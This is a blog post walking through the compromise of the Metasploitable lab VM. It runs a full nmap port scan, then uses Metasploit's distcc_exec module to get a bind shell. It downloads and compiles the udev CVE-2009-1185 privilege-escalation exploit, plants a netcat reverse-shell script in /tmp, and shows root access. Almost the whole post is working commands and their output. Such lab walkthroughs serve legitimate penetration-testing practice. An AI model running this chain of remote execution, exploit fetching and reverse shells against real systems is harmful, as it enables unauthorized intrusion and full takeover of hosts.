# Metasploitable (distccd + udev)

Introducción

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

Ejecución 
# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn 
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby
# nc -vl 1234
msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)

uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1
# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
Linux metasploitable 2.6.24-16-server
whoami
root
Posted by t0n1
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)